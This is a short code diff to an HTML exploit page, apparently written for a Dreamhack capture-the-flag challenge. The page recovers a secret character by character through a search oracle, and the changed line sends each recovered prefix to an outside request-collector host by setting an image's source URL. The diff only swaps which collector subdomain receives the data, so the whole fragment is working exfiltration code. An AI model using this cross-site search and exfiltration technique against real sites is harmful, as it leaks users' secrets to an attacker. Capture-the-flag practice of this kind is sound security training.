--- a/exserver.html
+++ b/exserver.html
@@ -30,7 +30,7 @@
             for (let c of chars) {
                 if (await search(secret + c)) {
                     secret += c;
-                    img.src = `https://eaxjsms.request.dreamhack.games/${secret}`;
+                    img.src = `https://iwvomrb.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
